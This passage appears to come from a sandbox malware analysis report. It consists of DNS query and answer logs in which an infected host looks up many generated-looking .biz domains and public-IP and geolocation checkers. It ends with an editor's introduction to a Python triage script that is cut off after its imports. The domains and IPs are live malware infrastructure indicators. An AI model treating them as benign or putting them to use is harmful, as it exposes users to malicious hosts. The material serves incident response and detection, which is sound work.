Jan 15, 2025 12:57:11.051700115 CET | 192.168.2.22 | 8.8.8.8 | 0xf478 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:11.896883965 CET | 192.168.2.22 | 8.8.8.8 | 0x1d8a | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:12.878703117 CET | 192.168.2.22 | 8.8.8.8 | 0x4a3 | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:13.607247114 CET | 192.168.2.22 | 8.8.8.8 | 0x3 | Standard query (0) | ww7.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:14.148497105 CET | 192.168.2.22 | 8.8.8.8 | 0x7dc0 | Standard query (0) | ww7.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:15.951770067 CET | 192.168.2.22 | 8.8.8.8 | 0xc0ed | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:15.987935066 CET | 192.168.2.22 | 8.8.8.8 | 0x6f9a | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:18.793936014 CET | 192.168.2.22 | 8.8.8.8 | 0x44db | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:18.807354927 CET | 192.168.2.22 | 8.8.8.8 | 0xbfc3 | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:18.887154102 CET | 192.168.2.22 | 8.8.8.8 | 0x5e79 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:42.575397015 CET | 192.168.2.22 | 8.8.8.8 | 0x4bec | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:44.412434101 CET | 192.168.2.22 | 8.8.8.8 | 0xb548 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:45.944802046 CET | 192.168.2.22 | 8.8.8.8 | 0xde77 | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:46.733863115 CET | 192.168.2.22 | 8.8.8.8 | 0x40f7 | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:47.254509926 CET | 192.168.2.22 | 8.8.8.8 | 0xeffa | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:48.115329027 CET | 192.168.2.22 | 8.8.8.8 | 0xf9d6 | Standard query (0) | ww7.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:48.246627092 CET | 192.168.2.22 | 8.8.8.8 | 0xd920 | Standard query (0) | ww7.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:49.263942003 CET | 192.168.2.22 | 8.8.8.8 | 0x3efc | Standard query (0) | ww12.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:49.293911934 CET | 192.168.2.22 | 8.8.8.8 | 0x3415 | Standard query (0) | ww12.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:50.104069948 CET | 192.168.2.22 | 8.8.8.8 | 0xabe7 | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:50.144217968 CET | 192.168.2.22 | 8.8.8.8 | 0xb991 | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:51.627363920 CET | 192.168.2.22 | 8.8.8.8 | 0x6c7e | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:51.635587931 CET | 192.168.2.22 | 8.8.8.8 | 0x22e2 | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:51.645697117 CET | 192.168.2.22 | 8.8.8.8 | 0x2629 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:01.741924047 CET | 192.168.2.22 | 8.8.8.8 | 0x5fa2 | Standard query (0) | vjaxhpbji.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:16.624852896 CET | 192.168.2.22 | 8.8.8.8 | 0xf946 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:18.184039116 CET | 192.168.2.22 | 8.8.8.8 | 0xd2f7 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:19.741847038 CET | 192.168.2.22 | 8.8.8.8 | 0x3fae | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:20.559298038 CET | 192.168.2.22 | 8.8.8.8 | 0xc326 | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:21.044343948 CET | 192.168.2.22 | 8.8.8.8 | 0xaca3 | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:21.815673113 CET | 192.168.2.22 | 8.8.8.8 | 0x6b2e | Standard query (0) | ww7.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:21.976964951 CET | 192.168.2.22 | 8.8.8.8 | 0x8877 | Standard query (0) | ww7.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:22.623039961 CET | 192.168.2.22 | 8.8.8.8 | 0x77d3 | Standard query (0) | ww12.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:22.645802975 CET | 192.168.2.22 | 8.8.8.8 | 0x14e3 | Standard query (0) | ww12.przvgke.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:34.584275007 CET | 192.168.2.22 | 8.8.8.8 | 0x6d77 | Standard query (0) | vjaxhpbji.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:45.254847050 CET | 192.168.2.22 | 8.8.8.8 | 0x2034 | Standard query (0) | xlfhhhm.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:46.814760923 CET | 192.168.2.22 | 8.8.8.8 | 0x7c10 | Standard query (0) | ifsaia.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:48.301343918 CET | 192.168.2.22 | 8.8.8.8 | 0x8260 | Standard query (0) | saytjshyf.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:48.804488897 CET | 192.168.2.22 | 8.8.8.8 | 0xc69f | Standard query (0) | vcddkls.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:50.227767944 CET | 192.168.2.22 | 8.8.8.8 | 0xd687 | Standard query (0) | fwiwk.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:50.925652027 CET | 192.168.2.22 | 8.8.8.8 | 0x2651 | Standard query (0) | ww12.fwiwk.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:50.937546015 CET | 192.168.2.22 | 8.8.8.8 | 0xb14b | Standard query (0) | ww12.fwiwk.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:52.394711971 CET | 192.168.2.22 | 8.8.8.8 | 0x7749 | Standard query (0) | ww7.fwiwk.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:52.569201946 CET | 192.168.2.22 | 8.8.8.8 | 0x510b | Standard query (0) | ww7.fwiwk.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:53.201472044 CET | 192.168.2.22 | 8.8.8.8 | 0xd517 | Standard query (0) | tbjrpv.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:54.019469976 CET | 192.168.2.22 | 8.8.8.8 | 0xaf89 | Standard query (0) | deoci.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:54.524389029 CET | 192.168.2.22 | 8.8.8.8 | 0x9694 | Standard query (0) | gytujflc.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:55.160516977 CET | 192.168.2.22 | 8.8.8.8 | 0x7c33 | Standard query (0) | qaynky.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:56.637732983 CET | 192.168.2.22 | 8.8.8.8 | 0x37d | Standard query (0) | bumxkqgxu.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:57.583293915 CET | 192.168.2.22 | 8.8.8.8 | 0x98ff | Standard query (0) | dwrqljrr.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:58.317264080 CET | 192.168.2.22 | 8.8.8.8 | 0xff61 | Standard query (0) | nqwjmb.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:59.241157055 CET | 192.168.2.22 | 8.8.8.8 | 0x48e4 | Standard query (0) | ytctnunms.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:58:59.726906061 CET | 192.168.2.22 | 8.8.8.8 | 0x9a2f | Standard query (0) | myups.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:59:00.761492968 CET | 192.168.2.22 | 8.8.8.8 | 0x39af | Standard query (0) | oshhkdluh.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:59:01.693620920 CET | 192.168.2.22 | 8.8.8.8 | 0xf6d1 | Standard query (0) | yunalwv.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:59:02.050468922 CET | 192.168.2.22 | 8.8.8.8 | 0x48e4 | Standard query (0) | jpskm.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:59:02.790848017 CET | 192.168.2.22 | 8.8.8.8 | 0xd7d8 | Standard query (0) | lrxdmhrr.biz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 15, 2025 12:57:07.345727921 CET | 8.8.8.8 | 192.168.2.22 | 0x25c | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:07.591567039 CET | 8.8.8.8 | 192.168.2.22 | 0xfd20 | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:08.816653967 CET | 8.8.8.8 | 192.168.2.22 | 0x4787 | No error (0) | ssbzmoy.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.176743031 CET | 8.8.8.8 | 192.168.2.22 | 0xc7f5 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 15, 2025 12:57:09.176743031 CET | 8.8.8.8 | 192.168.2.22 | 0xc7f5 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.176743031 CET | 8.8.8.8 | 192.168.2.22 | 0xc7f5 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.176743031 CET | 8.8.8.8 | 192.168.2.22 | 0xc7f5 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.176743031 CET | 8.8.8.8 | 192.168.2.22 | 0xc7f5 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.176743031 CET | 8.8.8.8 | 192.168.2.22 | 0xc7f5 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.215403080 CET | 8.8.8.8 | 192.168.2.22 | 0x19f3 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 15, 2025 12:57:09.215403080 CET | 8.8.8.8 | 192.168.2.22 | 0x19f3 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.215403080 CET | 8.8.8.8 | 192.168.2.22 | 0x19f3 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.215403080 CET | 8.8.8.8 | 192.168.2.22 | 0x19f3 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.215403080 CET | 8.8.8.8 | 192.168.2.22 | 0x19f3 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.215403080 CET | 8.8.8.8 | 192.168.2.22 | 0x19f3 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:10.706717968 CET | 8.8.8.8 | 192.168.2.22 | 0x74ff | No error (0) | cvgrf.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:11.061639071 CET | 8.8.8.8 | 192.168.2.22 | 0xf478 | No error (0) | reallyfreegeoip.org |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:11.061639071 CET | 8.8.8.8 | 192.168.2.22 | 0xf478 | No error (0) | reallyfreegeoip.org |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:11.061639071 CET | 8.8.8.8 | 192.168.2.22 | 0xf478 | No error (0) | reallyfreegeoip.org |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:11.061639071 CET | 8.8.8.8 | 192.168.2.22 | 0xf478 | No error (0) | reallyfreegeoip.org |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:11.061639071 CET | 8.8.8.8 | 192.168.2.22 | 0xf478 | No error (0) | reallyfreegeoip.org |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:11.061639071 CET | 8.8.8.8 | 192.168.2.22 | 0xf478 | No error (0) | reallyfreegeoip.org |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:11.061639071 CET | 8.8.8.8 | 192.168.2.22 | 0xf478 | No error (0) | reallyfreegeoip.org |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:11.904395103 CET | 8.8.8.8 | 192.168.2.22 | 0x1d8a | No error (0) | npukfztj.biz |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:12.885632038 CET | 8.8.8.8 | 192.168.2.22 | 0x4a3 | No error (0) | przvgke.biz |  | 72.52.178.23 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:13.613821030 CET | 8.8.8.8 | 192.168.2.22 | 0x3 | No error (0) | ww7.przvgke.biz | 76899.bodis.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 15, 2025 12:57:13.613821030 CET | 8.8.8.8 | 192.168.2.22 | 0x3 | No error (0) | 76899.bodis.com |  | 199.59.243.228 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:14.155237913 CET | 8.8.8.8 | 192.168.2.22 | 0x7dc0 | No error (0) | ww7.przvgke.biz | 76899.bodis.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.155237913 CET8.8.8.8192.168.2.220x7dc0No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.958900928 CET8.8.8.8192.168.2.220xc0edName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.996045113 CET8.8.8.8192.168.2.220x6f9aNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.801728010 CET8.8.8.8192.168.2.220x44dbName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.813716888 CET8.8.8.8192.168.2.220xbfc3Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.894185066 CET8.8.8.8192.168.2.220x5e79No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:42.582453012 CET8.8.8.8192.168.2.220x4becNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.419126987 CET8.8.8.8192.168.2.220xb548No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.951411009 CET8.8.8.8192.168.2.220xde77No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.740870953 CET8.8.8.8192.168.2.220x40f7No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.261042118 CET8.8.8.8192.168.2.220xeffaNo error (0)przvgke.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.121848106 CET8.8.8.8192.168.2.220xf9d6No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.121848106 CET8.8.8.8192.168.2.220xf9d6No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.253349066 CET8.8.8.8192.168.2.220xd920No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.253349066 CET8.8.8.8192.168.2.220xd920No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.273724079 CET8.8.8.8192.168.2.220x3efcNo error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.273724079 CET8.8.8.8192.168.2.220x3efcNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.273724079 CET8.8.8.8192.168.2.220x3efcNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.301213026 CET8.8.8.8192.168.2.220x3415No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.301213026 CET8.8.8.8192.168.2.220x3415No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.301213026 CET8.8.8.8192.168.2.220x3415No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.110743046 CET8.8.8.8192.168.2.220xabe7Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.152160883 CET8.8.8.8192.168.2.220xb991No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.634495974 CET8.8.8.8192.168.2.220x6c7eName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.642644882 CET8.8.8.8192.168.2.220x22e2Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.652574062 CET8.8.8.8192.168.2.220x2629No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.748874903 CET8.8.8.8192.168.2.220x5fa2No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.632355928 CET8.8.8.8192.168.2.220xf946No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.190633059 CET8.8.8.8192.168.2.220xd2f7No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.748874903 CET8.8.8.8192.168.2.220x3faeNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.566715956 CET8.8.8.8192.168.2.220xc326No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.050683975 CET8.8.8.8192.168.2.220xaca3No error (0)przvgke.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.822382927 CET8.8.8.8192.168.2.220x6b2eNo error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.822382927 CET8.8.8.8192.168.2.220x6b2eNo error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.984603882 CET8.8.8.8192.168.2.220x8877No error (0)ww7.przvgke.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.984603882 CET8.8.8.8192.168.2.220x8877No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.629940987 CET8.8.8.8192.168.2.220x77d3No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.629940987 CET8.8.8.8192.168.2.220x77d3No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.629940987 CET8.8.8.8192.168.2.220x77d3No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.652829885 CET8.8.8.8192.168.2.220x14e3No error (0)ww12.przvgke.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.652829885 CET8.8.8.8192.168.2.220x14e3No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.652829885 CET8.8.8.8192.168.2.220x14e3No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:34.591279984 CET8.8.8.8192.168.2.220x6d77No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:45.262031078 CET8.8.8.8192.168.2.220x2034No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.821993113 CET8.8.8.8192.168.2.220x7c10No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.308505058 CET8.8.8.8192.168.2.220x8260No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.810899019 CET8.8.8.8192.168.2.220xc69fNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.235430956 CET8.8.8.8192.168.2.220xd687No error (0)fwiwk.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.934954882 CET8.8.8.8192.168.2.220x2651No error (0)ww12.fwiwk.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.934954882 CET8.8.8.8192.168.2.220x2651No error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.934954882 CET8.8.8.8192.168.2.220x2651No error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.945674896 CET8.8.8.8192.168.2.220xb14bNo error (0)ww12.fwiwk.biz084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.945674896 CET8.8.8.8192.168.2.220xb14bNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.945674896 CET8.8.8.8192.168.2.220xb14bNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.401743889 CET8.8.8.8192.168.2.220x7749No error (0)ww7.fwiwk.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.401743889 CET8.8.8.8192.168.2.220x7749No error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.575774908 CET8.8.8.8192.168.2.220x510bNo error (0)ww7.fwiwk.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.575774908 CET8.8.8.8192.168.2.220x510bNo error (0)76899.bodis.com199.59.243.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.208211899 CET8.8.8.8192.168.2.220xd517No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.026063919 CET8.8.8.8192.168.2.220xaf89No error (0)deoci.biz34.227.7.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.532082081 CET8.8.8.8192.168.2.220x9694No error (0)gytujflc.biz208.117.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.169028997 CET8.8.8.8192.168.2.220x7c33No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.831235886 CET8.8.8.8192.168.2.220x37dNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.590039015 CET8.8.8.8192.168.2.220x98ffNo error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.324563026 CET8.8.8.8192.168.2.220xff61No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.248411894 CET8.8.8.8192.168.2.220x48e4No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.734153986 CET8.8.8.8192.168.2.220x9a2fNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.734153986 CET8.8.8.8192.168.2.220x9a2fNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.769293070 CET8.8.8.8192.168.2.220x39afNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.700954914 CET8.8.8.8192.168.2.220xf6d1No error (0)yunalwv.biz208.117.43.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.057585955 CET8.8.8.8192.168.2.220x48e4No error (0)jpskm.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.798438072 CET8.8.8.8192.168.2.220xd7d8No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
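The DNS answers above are the sandbox's raw table. The Python below is an added triage example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It parses a constructed, simplified subset of those rows (timestamp, transaction ID, reply code, queried name, answer, record type) and pulls out what a responder would want from such a table: NXDOMAIN replies, CNAMEs into the domain-parking services seen here (bodis.com, parkingcrew.net), distinct registered domains that resolve to the same address, lookups of the public-IP/geolocation services the report lists (reallyfreegeoip.org, checkip.dyndns.org), and a letter-frequency heuristic for generated-looking .biz names. The heuristic thresholds and the two-label registered-domain assumption are the editor's, not the report's.

```python
"""Triage DNS answers from a sandbox report (editor's example, not Joe Sandbox code)."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

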